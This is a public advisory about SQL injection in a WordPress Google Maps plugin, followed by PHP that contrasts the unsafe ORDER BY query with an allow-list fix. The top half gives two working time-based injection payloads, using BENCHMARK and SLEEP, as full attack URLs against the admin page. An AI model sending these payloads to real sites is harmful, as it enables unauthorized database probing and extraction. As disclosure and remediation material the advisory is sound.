ZerOne
EVIL
WordPress SQL Injection
This SQL injection vulnerability works against the Google Maps plugin installed on WordPress in versions below 4.0.4.
Security Risk - High
1. SQL injection
Vulnerable Function: $wpdb->get_results()
Vulnerable Parameter: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
2. SQL Option
# SQL injection
# Vulnerable Function: $wpdb->get_results()
# Vulnerable Variable: $_GET['orderby']
# Vulnerable URL:
http://vulnerablesite.com/wp-admin/...ation&order=asc&orderby=location_address AND (SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
# Disclosure Timeline
# 2018/05/11 Vulnerabilities discovered
# 2018/05/16 Vendor contacted
# 2018/06/08 No response
# 2018/06/12 Advisory released to the public
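The root cause the advisory points at is a classic one: the `orderby` and `order` request parameters end up inside the `ORDER BY` clause of a query handed to `$wpdb->get_results()`. The snippet below is an added illustration, not the plugin's own code; the table and column names (`map_locations`, `location_id`, `location_title`, `location_address`) and the function names are assumptions chosen to mirror the URL in the advisory. It shows the unsafe pattern next to a hardened version that maps both parameters onto an allow-list, since `$wpdb->prepare()` cannot parameterise identifiers or a sort direction.

```php
<?php
// Added example (hypothetical, not the plugin's code). Table/column names are assumptions.

// UNSAFE: request-controlled identifiers concatenated into the ORDER BY clause.
// prepare() would not help here; identifiers and sort direction are not bindable values.
function wpgmp_list_locations_unsafe() {
    global $wpdb;
    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'location_id';
    $order   = isset($_GET['order'])   ? $_GET['order']   : 'asc';
    $sql = "SELECT * FROM {$wpdb->prefix}map_locations ORDER BY $orderby $order";
    return $wpdb->get_results($sql);
}

// HARDENED: user input selects from an allow-list; anything unknown falls back to a default.
function wpgmp_list_locations_safe() {
    global $wpdb;

    // Only these columns may be sorted on. Keys are the values accepted in the URL,
    // values are the real column names that reach the query.
    $allowed_columns = array(
        'location_id'      => 'location_id',
        'location_title'   => 'location_title',
        'location_address' => 'location_address',
    );
    $requested = isset($_GET['orderby']) ? sanitize_key($_GET['orderby']) : '';
    $orderby   = isset($allowed_columns[$requested]) ? $allowed_columns[$requested] : 'location_id';

    // Sort direction is a two-value enum, never free text.
    $order = (isset($_GET['order']) && strtolower($_GET['order']) === 'desc') ? 'DESC' : 'ASC';

    // Genuine data values (here an optional search term) still go through prepare().
    $search = isset($_GET['s']) ? wp_unslash($_GET['s']) : '';
    $sql  = "SELECT * FROM {$wpdb->prefix}map_locations";
    $args = array();
    if ($search !== '') {
        $sql   .= " WHERE location_title LIKE %s";
        $args[] = '%' . $wpdb->esc_like($search) . '%';
    }
    // Both ORDER BY tokens now originate from this code, not from the request.
    $sql .= " ORDER BY $orderby $order";

    return $args ? $wpdb->get_results($wpdb->prepare($sql, $args))
                 : $wpdb->get_results($sql);
}
```

Because the vulnerable URL lives under `wp-admin/admin.php`, the listing function would normally also sit behind a capability check such as `current_user_can()` on the page callback; that limits who can reach the query at all, but it does not replace the allow-list, since any user who can open the admin page can still set the two parameters.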